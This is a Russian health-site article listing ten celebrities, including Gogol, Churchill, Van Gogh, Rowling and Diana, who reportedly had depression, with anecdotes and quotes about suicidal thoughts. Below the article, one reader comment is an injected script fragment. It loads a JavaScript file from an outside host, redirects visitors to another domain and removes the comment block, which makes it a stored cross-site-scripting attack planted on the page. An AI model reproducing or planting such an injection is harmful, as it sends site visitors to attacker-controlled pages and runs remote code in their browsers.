Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Топ-10 знаменитостей, стр...  >>  Топ-10 знаменитостей, страдавших депрессией
 
Обратная связь
 

Топ-10 знаменитостей, страдавших депрессией

Размер шрифта
16 сентября 2011 15:25
  • google_analytics: false
  • Нравится

Что такое депрессия? Сплин, тоска, уныние, а может, просто хандра? Депрессия – самая настоящая болезнь, которая погубила многих великих людей, и продолжает оставаться чумой 21 века. О том, как знаменитые личности боролись со своей болезнью, читайте в теме дня.

1. Николай Гоголь

Всю свою жизнь Н.В. Гоголь страдал маниакально-депрессивным психозом. «Мною овладела моя обыкновенная периодическая болезнь, во время которой я остаюсь почти в недвижном состоянии в комнате иногда на протяжении 2-3 недель». Так описывает свое состояние Гоголь. В 19 веке не было лекарств от депрессии, поэтому врач обертывал писателя в мокрую простыню, а духовник рекомендовал лечить душевную болезнь строгим постом. Не смотря на увещевания друзей, Гоголь в течение 2 недель заморил себя голодом. Когда врачебный консилиум решился на принудительное лечение, Гоголь уже впал в беспамятство и наутро скончался.

2. Уинстон Черчилль

Знаменитого премьера Великобритании времен Второй мировой всю жизнь преследовал «черный пес» – тяжелая депрессия. Сам факт, что Черчилль дал своей хандре кличку говорит о том, что депрессия была спутницей всей его жизни. «Я не люблю стоять у борта судна и смотреть вниз. Одно движение может решить все», – делился политик своими мыслями с врачом. Всю жизнь Черчилль боролся со своей болезнь, и, возможно, поэтому «прописал» себе виски с содовой. Начинал его пить уже за завтраком, а потом закуривал сигару. Но э это лишь несколько приглушало постоянную тоску и мысли о самоубийстве.

3. Винсент Ван Гог

Всемирно известный нидерландский художник писал свои картины в промежутках между приступами маниакально-депрессивного психоза. Но некоторые исследователи творчества художника уверены: его лучшие картины были написаны во время маниакальных фаз болезни. Постоянное употребление абсента и разгульный образ жизни привели к тому, что приступы происходили один за другими, «светлых» промежутков не осталось совсем. Очередной приступ тяжелой депрессии заставил Ван Гога совершить самоубийство.

4. Джоан Роулинг

Впервые автор серии романов о Гарри Поттере задумалась о самоубийстве, когда рассталась со своим первым мужем. После развода все ее мысли были о том, как выбраться из бедности и поставить на ноги дочь. Каждодневные заботы со временем вылились в затяжную депрессию. И только помощь психотерапевта позволила Джоан избавиться от негативных мыслей. Кстати, именно тогда она начала писать свою первую книгу о Гарри Поттере, которая через несколько лет сделала ее одной из самых богатых женщин в мире.

5. Хью Лори

Знаменитый британский актер, примеривший на себя маску доктора Хауса, похоже, понимает своего героя, как никто другой. Недавно актер признался, что страдал депрессией с подросткового возраста, но постоянно боролся с ней и даже виду не подавал. Действительно, никому бы даже в голову не пришло, что комик из «Шоу Фрая и Лори» страдает затяжной депрессией. Только после женитьбы Лори направился к психотерапевту, после чего признал: «Это крайняя степень эгоизма не обращаться к врачу, когда страдаешь депрессией. Ведь от того что тебе плохо, страдают и твои близкие».

6. Джим Керри

Еще один депрессивный комик в нашем списке. В своем интервью в программе «60 минут» Керри признался, что долгие годы чувствовал себя, как свой герой из фильма «Маска»: на съемочной площадке он кривлялся и гримасничал, а придя домой, глотал антидепрессанты от постоянной тоски. Однако вскоре после визита к психотерапевту Керри признал, что «проблемы надо решать, а не запивать таблетками», занялся спортом и даже пообещал написать книгу о своей борьбе с депрессией.

7. Принцесса Диана

В течение многих лет весь мир считал, что жизнь принцессы Дианы – настоящая сказка. На самом деле принцесса Уэльская страдала от одиночества, непонимания со стороны королевской семьи и депрессии. Однажды она, будучи беременной своим первенцем, даже бросилась вниз с лестницы. «Я хотела, чтобы Чарльз обнял меня и сказал, что любит, ведь все, на что он был способен, – это похлопать по спине». Уже после рождения принца Уильяма леди Ди призналась, что страдала от тяжелейшей постродовой депрессии.

8. Гвинет Пэлтроу

Гвинет Пэлтроу, звезда фильмов «Влюбленный Шекспир», «Семь», «Талантливый мистер Рипли» после рождения своего второго ребенка сказала в своем интервью, что страдает постродовой депрессией. «Мне казалось, что я словно робот: ничего не чувствую, не испытываю материнского инстинкта, контакта с ребенком. Даже сейчас, глядя на фотографии 3-месячного Мозеса, совершенно не помню то время». Постродовой депрессией страдает примерно 20% матерей. Этот период является самым опасным для психического здоровья женщины.

9. Вайнона Райдер

Игра в фильме «Прерванная жизнь» – о девушке, оказавшейся в психиатрической клинике – для молодой актрисы Вайноны Райдер была глубоко личным переживанием. После расставания с Джонни Дэппом актриса начала злоупотреблять алкоголем, ее стало одолевать постоянное чувство тревоги и депрессия. Говоря о своем состоянии Райдер говорила: «Бывают хорошие дни и плохие дни, а депрессия – это то, что всегда с тобой». Однажды Вайнона заснула с зажженной сигаретой. На следующий день она поняла, что все-таки пора обратиться за помощью к психиатру.

10. Кирстен Данст

Кирстен Данст давно окружают слухи о ее разгульном образе жизни, увлечении алкоголем и наркотиками. Поэтому актриса сделала официальное заявление, что отправляется в клинику, чтобы лечить тяжелую депрессию. «Мы все в одной лодке, а депрессия – это не шутка, и может угрожать каждому из нас». Кто знает, может, поэтому режиссер Ларс фон Триер дал главную роль в своем фильме «Меланхолия» именно Кирстен Данст. И может, заглянув однажды в лицо депрессии, поэтому актриса так убедительно сыграла.

Полина Скрябина / «Здоровье инфо»

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.